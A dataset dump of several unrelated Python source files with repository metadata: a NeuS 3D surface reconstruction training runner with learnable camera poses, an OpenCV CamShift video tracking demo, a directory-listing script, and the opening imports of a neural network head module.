9e40a4a7ae6fa13448f345e341c1c32845116799
| 29,411
|
py
|
Python
|
exp_runner.py
|
BoifZ/NeuS
|
a2900fa5c0b2a9d54b9cb5b364440ee7eecfb525
|
[
"MIT"
] | null | null | null |
exp_runner.py
|
BoifZ/NeuS
|
a2900fa5c0b2a9d54b9cb5b364440ee7eecfb525
|
[
"MIT"
] | null | null | null |
exp_runner.py
|
BoifZ/NeuS
|
a2900fa5c0b2a9d54b9cb5b364440ee7eecfb525
|
[
"MIT"
] | null | null | null |
import os
import time
import logging
import argparse
import numpy as np
import cv2 as cv
import trimesh
import torch
import torch.nn.functional as F
from torch.utils.tensorboard import SummaryWriter
from shutil import copyfile
from icecream import ic
from tqdm import tqdm
from pyhocon import ConfigFactory
from models.dataset import Dataset, load_K_Rt_from_P
from models.fields import RenderingNetwork, SDFNetwork, SingleVarianceNetwork, NeRF
from models.renderer import NeuSRenderer
from models.poses import LearnPose, LearnIntrin, RaysGenerator
# from models.depth import SiLogLoss
class Runner:
def __init__(self, conf_path, mode='train', case='CASE_NAME', is_continue=False):
self.device = torch.device('cuda')
# Configuration
self.conf_path = conf_path
f = open(self.conf_path)
conf_text = f.read()
conf_text = conf_text.replace('CASE_NAME', case)
f.close()
self.conf = ConfigFactory.parse_string(conf_text)
self.conf['dataset.data_dir'] = self.conf['dataset.data_dir'].replace('CASE_NAME', case)
self.base_exp_dir = self.conf['general.base_exp_dir']
os.makedirs(self.base_exp_dir, exist_ok=True)
self.dataset = Dataset(self.conf['dataset'])
self.iter_step = 0
self.poses_iter_step = 0
# Training parameters
self.end_iter = self.conf.get_int('train.end_iter')
self.save_freq = self.conf.get_int('train.save_freq')
self.report_freq = self.conf.get_int('train.report_freq')
self.val_freq = self.conf.get_int('train.val_freq')
self.val_mesh_freq = self.conf.get_int('train.val_mesh_freq')
self.batch_size = self.conf.get_int('train.batch_size')
self.validate_resolution_level = self.conf.get_int('train.validate_resolution_level')
self.learning_rate = self.conf.get_float('train.learning_rate')
self.learning_rate_alpha = self.conf.get_float('train.learning_rate_alpha')
self.use_white_bkgd = self.conf.get_bool('train.use_white_bkgd')
        self.warm_up_end = self.conf.get_int('train.warm_up_end', default=0)
        self.anneal_end = self.conf.get_int('train.anneal_end', default=0)
self.extract_depth = self.conf.get_bool('train.extract_depth')
self.learnable = self.conf.get_bool('train.focal_learnable')
if self.learnable:
self.focal_lr = self.conf.get_float('train.focal_lr')
self.pose_lr = self.conf.get_float('train.pose_lr')
self.focal_lr_gamma = self.conf.get_float('train.focal_lr_gamma')
self.pose_lr_gamma = self.conf.get_float('train.pose_lr_gamma')
self.step_size = self.conf.get_int('train.step_size')
self.start_refine_pose_iter = self.conf.get_int('train.start_refine_pose_iter')
self.start_refine_focal_iter = self.conf.get_int('train.start_refine_focal_iter')
# learn focal parameter
self.intrin_net = LearnIntrin(self.dataset.H, self.dataset.W, **self.conf['model.focal'], init_focal=self.dataset.focal).to(self.device)
# learn pose for each image
self.pose_param_net = LearnPose(self.dataset.n_images, **self.conf['model.pose'], init_c2w=self.dataset.pose_all).to(self.device)
self.optimizer_focal = torch.optim.Adam(self.intrin_net.parameters(), lr=self.focal_lr)
self.optimizer_pose = torch.optim.Adam(self.pose_param_net.parameters(), lr=self.pose_lr)
            # match scheduler_pose below: milestones every step_size iterations
            self.scheduler_focal = torch.optim.lr_scheduler.MultiStepLR(self.optimizer_focal,
                                                                        milestones=range(self.warm_up_end, self.end_iter, self.step_size),
                                                                        gamma=self.focal_lr_gamma)
self.scheduler_pose = torch.optim.lr_scheduler.MultiStepLR(self.optimizer_pose, milestones=range(self.warm_up_end, self.end_iter, self.step_size),
gamma=self.pose_lr_gamma)
else:
self.intrin_net = self.dataset.intrinsics_all
self.pose_param_net = self.dataset.pose_all
self.rays_generator = RaysGenerator(self.dataset.images_lis, self.dataset.masks_lis, self.dataset.depth_lis, self.pose_param_net, self.intrin_net, learnable=self.learnable)
# Weights
self.igr_weight = self.conf.get_float('train.igr_weight')
self.mask_weight = self.conf.get_float('train.mask_weight')
self.is_continue = is_continue
self.mode = mode
self.model_list = []
self.writer = None
# Networks
params_to_train = []
self.nerf_outside = NeRF(**self.conf['model.nerf']).to(self.device)
self.sdf_network = SDFNetwork(**self.conf['model.sdf_network']).to(self.device)
self.deviation_network = SingleVarianceNetwork(**self.conf['model.variance_network']).to(self.device)
self.color_network = RenderingNetwork(**self.conf['model.rendering_network']).to(self.device)
params_to_train += list(self.nerf_outside.parameters())
params_to_train += list(self.sdf_network.parameters())
params_to_train += list(self.deviation_network.parameters())
params_to_train += list(self.color_network.parameters())
if self.extract_depth:
# add depth_feats+
self.depth_weight = self.conf.get_float('train.depth_weight')
self.depth_network = RenderingNetwork(**self.conf['model.depth_extract_network']).to(self.device)
# self.d_loss = SiLogLoss()
params_to_train += list(self.depth_network.parameters())
else:
self.depth_network = None
self.renderer = NeuSRenderer(self.nerf_outside,
self.sdf_network,
self.deviation_network,
self.color_network,
self.depth_network,
**self.conf['model.neus_renderer'])
self.optimizer = torch.optim.Adam(params_to_train, lr=self.learning_rate)
# Load checkpoint
latest_model_name = None
if is_continue:
model_list_raw = os.listdir(os.path.join(self.base_exp_dir, 'checkpoints'))
model_list = []
for model_name in model_list_raw:
if model_name[-3:] == 'pth' and int(model_name[5:-4]) <= self.end_iter:
model_list.append(model_name)
model_list.sort()
latest_model_name = model_list[-1]
if latest_model_name is not None:
logging.info('Find checkpoint: {}'.format(latest_model_name))
self.load_checkpoint(latest_model_name)
# Backup codes and configs for debug
if self.mode[:5] == 'train':
self.file_backup()
def train(self):
self.writer = SummaryWriter(log_dir=os.path.join(self.base_exp_dir, 'logs'))
self.update_learning_rate()
res_step = self.end_iter - self.iter_step
image_perm = self.get_image_perm()
if self.learnable:
if self.poses_iter_step >= self.start_refine_pose_iter:
self.pose_param_net.train()
else:
self.pose_param_net.eval()
if self.poses_iter_step >= self.start_refine_focal_iter:
self.intrin_net.train()
else:
self.intrin_net.eval()
for iter_i in tqdm(range(res_step)):
if self.learnable:
if self.poses_iter_step >= self.start_refine_pose_iter:
self.pose_param_net.train()
if self.poses_iter_step >= self.start_refine_focal_iter:
self.intrin_net.train()
img_idx = image_perm[self.iter_step % len(image_perm)]
# data = self.dataset.gen_random_rays_at(image_perm[self.iter_step % len(image_perm)], self.batch_size)
data = self.rays_generator.gen_random_rays_at(img_idx, self.batch_size)
rays_o, rays_d, true_rgb, mask, gt_feats = data[:, :3], data[:, 3: 6], data[:, 6: 9], data[:, 9: 10], data[:, 10:]
near, far = self.dataset.near_far_from_sphere(rays_o, rays_d)
background_rgb = None
if self.use_white_bkgd:
background_rgb = torch.ones([1, 3])
if self.mask_weight > 0.0:
mask = (mask > 0.5).float()
else:
mask = torch.ones_like(mask)
mask_sum = mask.sum() + 1e-5
render_out = self.renderer.render(rays_o, rays_d, near, far,
background_rgb=background_rgb,
cos_anneal_ratio=self.get_cos_anneal_ratio())
depth_feats = render_out['render_feats']
color_fine = render_out['color_fine']
s_val = render_out['s_val']
cdf_fine = render_out['cdf_fine']
gradient_error = render_out['gradient_error']
weight_max = render_out['weight_max']
weight_sum = render_out['weight_sum']
# Loss
color_error = (color_fine - true_rgb) * mask
color_fine_loss = F.l1_loss(color_error, torch.zeros_like(color_error), reduction='sum') / mask_sum
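            # PSNR over masked pixels: 20 * log10(MAX / RMSE) with MAX = 1.0;
            # the factor mask_sum * 3.0 counts the three RGB channels per pixel.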
psnr = 20.0 * torch.log10(1.0 / (((color_fine - true_rgb)**2 * mask).sum() / (mask_sum * 3.0)).sqrt())
eikonal_loss = gradient_error
mask_loss = F.binary_cross_entropy(weight_sum.clip(1e-3, 1.0 - 1e-3), mask)
loss = color_fine_loss +\
eikonal_loss * self.igr_weight +\
mask_loss * self.mask_weight
if self.extract_depth:
# print(gt_feats.shape)
# depth_loss = self.d_loss(torch.sigmoid(depth_feats), gt_feats)
# depth_fine_loss = F.l1_loss(depth_loss, torch.zeros_like(depth_loss), reduction='sum') / mask_sum
# loss += depth_loss
# self.writer.add_scalar('Loss/depth_loss', depth_loss, self.iter_step)
depth_feat_error = (depth_feats - gt_feats) * mask
depth_fine_loss = F.l1_loss(depth_feat_error, torch.zeros_like(depth_feat_error), reduction='sum') / mask_sum
psnr_dfeat = 20.0 * torch.log10(1.0 / (((depth_feats - gt_feats)**2 * mask).sum() / (mask_sum * 3.0)).sqrt())
loss += depth_fine_loss * self.depth_weight
self.writer.add_scalar('Loss/depth_loss', depth_fine_loss, self.iter_step)
self.writer.add_scalar('Statistics/psnr_dfeat', psnr_dfeat, self.iter_step)
# print(depth_loss)
# print(loss)
self.optimizer.zero_grad()
if self.learnable:
self.optimizer_focal.zero_grad()
self.optimizer_pose.zero_grad()
loss.backward()
self.optimizer.step()
if self.learnable:
self.optimizer_focal.step()
self.optimizer_pose.step()
self.iter_step += 1
self.poses_iter_step += 1
self.writer.add_scalar('Loss/loss', loss, self.iter_step)
self.writer.add_scalar('Loss/color_loss', color_fine_loss, self.iter_step)
self.writer.add_scalar('Loss/eikonal_loss', eikonal_loss, self.iter_step)
self.writer.add_scalar('Statistics/s_val', s_val.mean(), self.iter_step)
self.writer.add_scalar('Statistics/cdf', (cdf_fine[:, :1] * mask).sum() / mask_sum, self.iter_step)
self.writer.add_scalar('Statistics/weight_max', (weight_max * mask).sum() / mask_sum, self.iter_step)
self.writer.add_scalar('Statistics/psnr', psnr, self.iter_step)
if self.iter_step % self.report_freq == 0:
print(self.base_exp_dir)
                print('iter:{:>8d} loss = {} lr={}'.format(self.iter_step, loss, self.optimizer.param_groups[0]['lr']))
if self.iter_step % self.save_freq == 0:
self.save_checkpoint()
# pose_history_milestone = list(range(0, 100, 5)) + list(range(100, 1000, 100)) + list(range(1000, 10000, 1000))
# if self.poses_iter_step in pose_history_milestone:
# self.save_pnf_checkpoint()
if self.iter_step % self.val_freq == 0:
self.validate_image()
if self.iter_step % self.val_mesh_freq == 0:
res = 128
if self.iter_step % 10000==0:
res = 256
self.validate_mesh(resolution=res)
self.update_learning_rate()
if self.iter_step % len(image_perm) == 0:
image_perm = self.get_image_perm()
def get_image_perm(self):
return torch.randperm(self.dataset.n_images)
def get_cos_anneal_ratio(self):
if self.anneal_end == 0.0:
return 1.0
else:
return np.min([1.0, self.iter_step / self.anneal_end])
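    # Schedule below: linear warm-up for the first warm_up_end iterations, then
    # a cosine decay of the LR factor from 1.0 down to learning_rate_alpha.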
def update_learning_rate(self):
if self.iter_step < self.warm_up_end:
learning_factor = self.iter_step / self.warm_up_end
else:
alpha = self.learning_rate_alpha
progress = (self.iter_step - self.warm_up_end) / (self.end_iter - self.warm_up_end)
learning_factor = (np.cos(np.pi * progress) + 1.0) * 0.5 * (1 - alpha) + alpha
for g in self.optimizer.param_groups:
g['lr'] = self.learning_rate * learning_factor
if self.learnable:
self.scheduler_focal.step()
self.scheduler_pose.step()
def file_backup(self):
dir_lis = self.conf['general.recording']
os.makedirs(os.path.join(self.base_exp_dir, 'recording'), exist_ok=True)
for dir_name in dir_lis:
cur_dir = os.path.join(self.base_exp_dir, 'recording', dir_name)
os.makedirs(cur_dir, exist_ok=True)
files = os.listdir(dir_name)
for f_name in files:
if f_name[-3:] == '.py':
copyfile(os.path.join(dir_name, f_name), os.path.join(cur_dir, f_name))
copyfile(self.conf_path, os.path.join(self.base_exp_dir, 'recording', 'config.conf'))
def load_checkpoint(self, checkpoint_name):
checkpoint = torch.load(os.path.join(self.base_exp_dir, 'checkpoints', checkpoint_name), map_location=self.device)
self.nerf_outside.load_state_dict(checkpoint['nerf'])
self.sdf_network.load_state_dict(checkpoint['sdf_network_fine'])
self.deviation_network.load_state_dict(checkpoint['variance_network_fine'])
self.color_network.load_state_dict(checkpoint['color_network_fine'])
self.optimizer.load_state_dict(checkpoint['optimizer'])
self.iter_step = checkpoint['iter_step']
if self.learnable:
self.load_pnf_checkpoint(checkpoint_name.replace('ckpt', 'pnf'))
logging.info('End')
def save_checkpoint(self):
        checkpoint = {
            'nerf': self.nerf_outside.state_dict(),
            'sdf_network_fine': self.sdf_network.state_dict(),
            'variance_network_fine': self.deviation_network.state_dict(),
            'color_network_fine': self.color_network.state_dict(),
            'optimizer': self.optimizer.state_dict(),
            'iter_step': self.iter_step,
        }
        # the depth network is optional; guard against None (extract_depth off)
        if self.depth_network is not None:
            checkpoint['depth_network_fine'] = self.depth_network.state_dict()
os.makedirs(os.path.join(self.base_exp_dir, 'checkpoints'), exist_ok=True)
torch.save(checkpoint, os.path.join(self.base_exp_dir, 'checkpoints', 'ckpt_{:0>6d}.pth'.format(self.iter_step)))
if self.learnable:
self.save_pnf_checkpoint()
def load_pnf_checkpoint(self, checkpoint_name):
checkpoint = torch.load(os.path.join(self.base_exp_dir, 'pnf_checkpoints', checkpoint_name), map_location=self.device)
self.intrin_net.load_state_dict(checkpoint['intrin_net'])
self.pose_param_net.load_state_dict(checkpoint['pose_param_net'])
self.optimizer_focal.load_state_dict(checkpoint['optimizer_focal'])
self.optimizer_pose.load_state_dict(checkpoint['optimizer_pose'])
self.poses_iter_step = checkpoint['poses_iter_step']
def save_pnf_checkpoint(self):
pnf_checkpoint = {
'intrin_net': self.intrin_net.state_dict(),
'pose_param_net': self.pose_param_net.state_dict(),
'optimizer_focal': self.optimizer_focal.state_dict(),
'optimizer_pose': self.optimizer_pose.state_dict(),
'poses_iter_step': self.poses_iter_step,
}
os.makedirs(os.path.join(self.base_exp_dir, 'pnf_checkpoints'), exist_ok=True)
torch.save(pnf_checkpoint, os.path.join(self.base_exp_dir, 'pnf_checkpoints', 'pnf_{:0>6d}.pth'.format(self.iter_step)))
def store_current_pose(self):
        self.pose_param_net.eval()
        num_cams = self.pose_param_net.module.num_cams if isinstance(self.pose_param_net, torch.nn.DataParallel) else self.pose_param_net.num_cams
        c2w_list = []
        for i in range(num_cams):
            c2w = self.pose_param_net(i)  # (4, 4)
c2w_list.append(c2w)
c2w_list = torch.stack(c2w_list) # (N, 4, 4)
c2w_list = c2w_list.detach().cpu().numpy()
np.save(os.path.join(self.base_exp_dir, 'cam_poses', 'pose_{:0>6d}.npy'.format(self.iter_step)), c2w_list)
return
def validate_image(self, idx=-1, resolution_level=-1):
if idx < 0:
idx = np.random.randint(self.dataset.n_images)
print('Validate: iter: {}, camera: {}'.format(self.iter_step, idx))
if resolution_level < 0:
resolution_level = self.validate_resolution_level
# rays_o, rays_d = self.dataset.gen_rays_at(idx, resolution_level=resolution_level)
rays_o, rays_d = self.rays_generator.gen_rays_at(idx, resolution_level=resolution_level)
H, W, _ = rays_o.shape
rays_o = rays_o.reshape(-1, 3).split(self.batch_size)
rays_d = rays_d.reshape(-1, 3).split(self.batch_size)
out_rgb_fine = []
out_normal_fine = []
for rays_o_batch, rays_d_batch in zip(rays_o, rays_d):
near, far = self.dataset.near_far_from_sphere(rays_o_batch, rays_d_batch)
background_rgb = torch.ones([1, 3]) if self.use_white_bkgd else None
render_out = self.renderer.render(rays_o_batch,
rays_d_batch,
near,
far,
cos_anneal_ratio=self.get_cos_anneal_ratio(),
background_rgb=background_rgb)
def feasible(key): return (key in render_out) and (render_out[key] is not None)
if feasible('color_fine'):
out_rgb_fine.append(render_out['color_fine'].detach().cpu().numpy())
if feasible('gradients') and feasible('weights'):
n_samples = self.renderer.n_samples + self.renderer.n_importance
normals = render_out['gradients'] * render_out['weights'][:, :n_samples, None]
if feasible('inside_sphere'):
normals = normals * render_out['inside_sphere'][..., None]
normals = normals.sum(dim=1).detach().cpu().numpy()
out_normal_fine.append(normals)
del render_out
img_fine = None
if len(out_rgb_fine) > 0:
img_fine = (np.concatenate(out_rgb_fine, axis=0).reshape([H, W, 3, -1]) * 256).clip(0, 255)
normal_img = None
if len(out_normal_fine) > 0:
normal_img = np.concatenate(out_normal_fine, axis=0)
rot = np.linalg.inv(self.dataset.pose_all[idx, :3, :3].detach().cpu().numpy())
normal_img = (np.matmul(rot[None, :, :], normal_img[:, :, None])
.reshape([H, W, 3, -1]) * 128 + 128).clip(0, 255)
os.makedirs(os.path.join(self.base_exp_dir, 'validations_fine'), exist_ok=True)
os.makedirs(os.path.join(self.base_exp_dir, 'normals'), exist_ok=True)
for i in range(img_fine.shape[-1]):
if len(out_rgb_fine) > 0:
cv.imwrite(os.path.join(self.base_exp_dir,
'validations_fine',
'{:0>8d}_{}_{}.png'.format(self.iter_step, i, idx)),
np.concatenate([img_fine[..., i],
self.rays_generator.image_at(idx, resolution_level=resolution_level)]))
# self.dataset.image_at(idx, resolution_level=resolution_level)]))
if len(out_normal_fine) > 0:
cv.imwrite(os.path.join(self.base_exp_dir,
'normals',
'{:0>8d}_{}_{}.png'.format(self.iter_step, i, idx)),
normal_img[..., i])
def render_novel_image(self, idx_0, idx_1, ratio, resolution_level):
"""
Interpolate view between two cameras.
"""
# rays_o, rays_d = self.dataset.gen_rays_between(idx_0, idx_1, ratio, resolution_level=resolution_level)
rays_o, rays_d = self.rays_generator.gen_rays_between(idx_0, idx_1, ratio, resolution_level=resolution_level)
H, W, _ = rays_o.shape
rays_o = rays_o.reshape(-1, 3).split(self.batch_size)
rays_d = rays_d.reshape(-1, 3).split(self.batch_size)
out_rgb_fine = []
for rays_o_batch, rays_d_batch in zip(rays_o, rays_d):
near, far = self.dataset.near_far_from_sphere(rays_o_batch, rays_d_batch)
background_rgb = torch.ones([1, 3]) if self.use_white_bkgd else None
render_out = self.renderer.render(rays_o_batch,
rays_d_batch,
near,
far,
cos_anneal_ratio=self.get_cos_anneal_ratio(),
background_rgb=background_rgb)
out_rgb_fine.append(render_out['color_fine'].detach().cpu().numpy())
del render_out
img_fine = (np.concatenate(out_rgb_fine, axis=0).reshape([H, W, 3]) * 256).clip(0, 255).astype(np.uint8)
return img_fine
def get_gt_poses(self, cameras_sphere, cam_num, color=None, length=0.5):
from vis_cam_traj import draw_camera_frustum_geometry
if color is None:
color = np.random.rand(1, 3)
camera_dict = np.load(cameras_sphere)
intrinsics_all = []
pose_all = []
for idx in range(cam_num):
scale_mat = camera_dict['scale_mat_%d' % idx].astype(np.float32)
world_mat = camera_dict['world_mat_%d' % idx].astype(np.float32)
P = world_mat @ scale_mat
P = P[:3, :4]
intrinsics, pose = load_K_Rt_from_P(None, P)
intrinsics_all.append(intrinsics.astype(np.float32))
pose_all.append(pose.astype(np.float32))
c2w_gt = np.array(pose_all)
fx_gt = intrinsics_all[0][0, 0]
gt_color = np.array([color], dtype=np.float32)
gt_color = np.tile(gt_color, (cam_num, 1))
gt_est_list = draw_camera_frustum_geometry(c2w_gt, self.dataset.H, self.dataset.W,
fx_gt, fx_gt,
length, gt_color)
return gt_est_list
def show_cam_pose(self, iter_show=-1, random_color=True):
import open3d as o3d
from vis_cam_traj import draw_camera_frustum_geometry
cam_num = 33
# cam_num = self.dataset.n_images
'''Get focal'''
fxfy = self.intrin_net(0).cpu().detach().numpy()[0][0]
print('learned cam intrinsics:')
print('fxfy', fxfy)
'''Get all poses in (N, 4, 4)'''
c2ws_est = torch.stack([self.pose_param_net(i) for i in range(cam_num)]) # (N, 4, 4)
'''Frustum properties'''
frustum_length = 0.5
random_color = random_color
all_color = np.random.rand(3, 3)
if random_color:
frustum_color = np.random.rand(cam_num, 3)
else:
# frustum_color = np.array([[249, 65, 68]], dtype=np.float32) / 255
frustum_color = np.array([all_color[0]], dtype=np.float32)
frustum_color = np.tile(frustum_color, (cam_num, 1))
'''Get frustums'''
        frustum_est_list = draw_camera_frustum_geometry(c2ws_est.detach().cpu().numpy(), self.dataset.H, self.dataset.W,
fxfy, fxfy,
frustum_length, frustum_color)
# init poses
c2w_init = self.dataset.pose_all
fx_init = self.dataset.focal.cpu().detach()
init_color = np.array([all_color[1]], dtype=np.float32)
init_color = np.tile(init_color, (cam_num, 1))
        init_est_list = draw_camera_frustum_geometry(c2w_init.detach().cpu().numpy(), self.dataset.H, self.dataset.W,
fx_init, fx_init,
frustum_length, init_color)
# gt poses
gt_est_list = self.get_gt_poses(os.path.join('./exp/teeth_noise', 'cameras_sphere.npz'), cam_num, color=all_color[2], length=frustum_length)
geometry_to_draw = []
geometry_to_draw.append(frustum_est_list)
geometry_to_draw.append(init_est_list)
geometry_to_draw.append(gt_est_list)
# mesh
mesh = o3d.io.read_triangle_mesh(os.path.join(self.base_exp_dir, 'meshes', '{:0>8d}.ply'.format(iter_show)))
mesh.compute_vertex_normals()
geometry_to_draw.append(mesh)
o3d.visualization.draw_geometries(geometry_to_draw)
def validate_mesh(self, world_space=False, resolution=256, threshold=0.0):
bound_min = torch.tensor(self.dataset.object_bbox_min, dtype=torch.float32)
bound_max = torch.tensor(self.dataset.object_bbox_max, dtype=torch.float32)
vertices, triangles =\
self.renderer.extract_geometry(bound_min, bound_max, resolution=resolution, threshold=threshold)
os.makedirs(os.path.join(self.base_exp_dir, 'meshes'), exist_ok=True)
if world_space:
vertices = vertices * self.dataset.scale_mats_np[0][0, 0] + self.dataset.scale_mats_np[0][:3, 3][None]
mesh = trimesh.Trimesh(vertices, triangles)
mesh.export(os.path.join(self.base_exp_dir, 'meshes', '{:0>8d}.ply'.format(self.iter_step)))
logging.info('End')
def interpolate_view(self, img_idx_0, img_idx_1):
images = []
n_frames = 60
for i in range(n_frames):
print(i)
images.append(self.render_novel_image(img_idx_0,
img_idx_1,
np.sin(((i / n_frames) - 0.5) * np.pi) * 0.5 + 0.5,
resolution_level=4))
for i in range(n_frames):
images.append(images[n_frames - i - 1])
fourcc = cv.VideoWriter_fourcc(*'mp4v')
video_dir = os.path.join(self.base_exp_dir, 'render')
os.makedirs(video_dir, exist_ok=True)
h, w, _ = images[0].shape
writer = cv.VideoWriter(os.path.join(video_dir,
'{:0>8d}_{}_{}.mp4'.format(self.iter_step, img_idx_0, img_idx_1)),
fourcc, 30, (w, h))
for image in images:
writer.write(image)
writer.release()
if __name__ == '__main__':
print('Hello Wooden')
torch.set_default_tensor_type('torch.cuda.FloatTensor')
FORMAT = "[%(filename)s:%(lineno)s - %(funcName)20s() ] %(message)s"
logging.basicConfig(level=logging.DEBUG, format=FORMAT)
parser = argparse.ArgumentParser()
parser.add_argument('--conf', type=str, default='./confs/base.conf')
parser.add_argument('--mode', type=str, default='train')
parser.add_argument('--mcube_threshold', type=float, default=0.0)
parser.add_argument('--is_continue', default=False, action="store_true")
parser.add_argument('--gpu', type=int, default=0)
parser.add_argument('--case', type=str, default='')
args = parser.parse_args()
torch.cuda.set_device(args.gpu)
runner = Runner(args.conf, args.mode, args.case, args.is_continue)
if args.mode == 'train':
runner.train()
elif args.mode == 'validate_mesh':
runner.validate_mesh(world_space=True, resolution=512, threshold=args.mcube_threshold)
elif args.mode.startswith('interpolate'): # Interpolate views given two image indices
_, img_idx_0, img_idx_1 = args.mode.split('_')
img_idx_0 = int(img_idx_0)
img_idx_1 = int(img_idx_1)
runner.interpolate_view(img_idx_0, img_idx_1)
elif args.mode.startswith('showcam'):
_, iter_show = args.mode.split('_')
runner.load_pnf_checkpoint(('pnf_{:0>6d}.pth').format(int(iter_show)))
runner.show_cam_pose(int(iter_show))
| 47.590615
| 180
| 0.605352
| 3,826
| 29,411
| 4.356769
| 0.108207
| 0.023517
| 0.025916
| 0.019317
| 0.401344
| 0.328274
| 0.258624
| 0.207931
| 0.160837
| 0.127122
| 0
| 0.015732
| 0.278161
| 29,411
| 617
| 181
| 47.667747
| 0.76943
| 0.044643
| 0
| 0.156118
| 0
| 0
| 0.074344
| 0.012021
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037975
| false
| 0
| 0.046414
| 0.004219
| 0.099156
| 0.014768
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e44b7345e9261d66e37f31753ad1afb6577bc5f
| 2,007
|
py
|
Python
|
code/video-analiz/python/camshift.py
|
BASARIRR/computer-vision-guide
|
0a11726fb2be0cad63738ab45fd4edc4515441d2
|
[
"MIT"
] | 230
|
2019-01-17T01:00:53.000Z
|
2022-03-31T18:00:09.000Z
|
code/video-analiz/python/camshift.py
|
sturlu/goruntu-isleme-kilavuzu
|
e9377ace3823ca5f2d06ca78a11884256539134d
|
[
"MIT"
] | 8
|
2019-05-03T07:44:50.000Z
|
2022-02-10T00:14:38.000Z
|
code/video-analiz/python/camshift.py
|
sturlu/goruntu-isleme-kilavuzu
|
e9377ace3823ca5f2d06ca78a11884256539134d
|
[
"MIT"
] | 71
|
2019-01-17T12:11:06.000Z
|
2022-03-03T22:02:46.000Z
|
#Python v3, OpenCV v3.4.2
import numpy as np
import cv2
videoCapture = cv2.VideoCapture("video.mp4")
ret,camera_input = videoCapture.read()
rows, cols = camera_input.shape[:2]
'''
A region is defined on the video file for Mean Shift.
These coordinates define the rectangle whose weighted average will be computed. '''
# You can change the w and h sizes and observe how the results change
w = 10
h = 15
col = int((cols - w) / 2)
row = int((rows - h) / 2)
shiftWindow = (col, row, w, h)
'''
Now let's create a mask region to balance the brightness and color distribution
of the image, and apply histogram equalization over that region
'''
roi = camera_input[row:row + h, col:col + w]
hsv_roi = cv2.cvtColor(roi, cv2.COLOR_BGR2HSV)
mask = cv2.inRange(hsv_roi, np.array((0., 60.,32.)), np.array((180.,255.,255.)))
histogram = cv2.calcHist([hsv_roi],[0],mask,[180],[0,180])
cv2.normalize(histogram,histogram,0,255,cv2.NORM_MINMAX)
'''
This termination criterion determines how many shift/compute iterations the algorithm runs internally.
'''
term_crit = ( cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 10, 1 )
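# i.e. stop after at most 10 iterations, or once the window shifts by less than 1 pixel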
while True:
    # Read one frame from the video
    ret, camera_input = videoCapture.read()
    if not ret:  # stop when the video ends
        break
    '''
    Within the video we first take a histogram in the HSV color space, apply
    histogram back projection, and locate the segments of the target region
    across the whole image.
    '''
    hsv = cv2.cvtColor(camera_input, cv2.COLOR_BGR2HSV)
    dst = cv2.calcBackProject([hsv], [0], histogram, [0, 180], 1)
    # CamShift is re-applied for each new position
    ret, shiftWindow = cv2.CamShift(dst, shiftWindow, term_crit)
    # Draw the detected region on the image
    pts = cv2.boxPoints(ret)
    pts = np.int0(pts)  # np.int0 is an alias of np.intp (removed in NumPy 2.0)
    result_image = cv2.polylines(camera_input, [pts], True, 255, 2)
    cv2.imshow('CamShift (Continuous Mean Shift) Algorithm', result_image)
    k = cv2.waitKey(60) & 0xff
    if k == 27:  # ESC quits
        break
videoCapture.release()
cv2.destroyAllWindows()
| 32.901639
| 125
| 0.727454
| 274
| 2,007
| 5.255474
| 0.514599
| 0.045833
| 0.019444
| 0.036111
| 0.041667
| 0
| 0
| 0
| 0
| 0
| 0
| 0.045131
| 0.160937
| 2,007
| 61
| 126
| 32.901639
| 0.809976
| 0.103637
| 0
| 0.071429
| 0
| 0
| 0.042662
| 0
| 0
| 0
| 0.003413
| 0
| 0
| 1
| 0
| false
| 0
| 0.071429
| 0
| 0.071429
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e459ba91afb3134b739b9c40e6c311ac98e5335
| 346
|
py
|
Python
|
DTT_files/dtt.py
|
stecik/Directory_to_text
|
f93c76f820ff7dc39e213779115861e53ed6a266
|
[
"MIT"
] | null | null | null |
DTT_files/dtt.py
|
stecik/Directory_to_text
|
f93c76f820ff7dc39e213779115861e53ed6a266
|
[
"MIT"
] | null | null | null |
DTT_files/dtt.py
|
stecik/Directory_to_text
|
f93c76f820ff7dc39e213779115861e53ed6a266
|
[
"MIT"
] | null | null | null |
from dtt_class import DTT
from parser import args
if __name__ == "__main__":
    dtt = DTT()
    # Creates a list of files and subdirectories
    try:
        entries = dtt.dir_to_list(args.directory, args)
        # Creates a .txt file with the list
        dtt.list_to_txt(args.output_file, entries)
    except Exception as e:
        print(f"Error: {e}")
| 28.833333
| 49
| 0.644509
| 53
| 346
| 3.943396
| 0.622642
| 0.076555
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.265896
| 346
| 12
| 50
| 28.833333
| 0.822835
| 0.219653
| 0
| 0
| 0
| 0
| 0.067164
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.222222
| 0
| 0.222222
| 0.111111
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e45b73d08315aaa5770ad5f620934e0e80ebd70
| 1,675
|
py
|
Python
|
src/models/head.py
|
takedarts/DenseResNet
|
d5f9c143ed3c484436a2a5bac366c3795e5d47ec
|
[
"MIT"
] | null | null | null |
src/models/head.py
|
takedarts/DenseResNet
|
d5f9c143ed3c484436a2a5bac366c3795e5d47ec
|
[
"MIT"
] | null | null | null |
src/models/head.py
|
takedarts/DenseResNet
|
d5f9c143ed3c484436a2a5bac366c3795e5d47ec
|
[
"MIT"
] | null | null | null |
import torch.nn as nn
import collections
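# Head variants placed after a backbone's final stage. BasicHead is an
# intentional no-op (identity); the others build their layers through an
# OrderedDict that drops any entry whose module is None, so a head degrades
# gracefully when normalization or activation is not configured.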
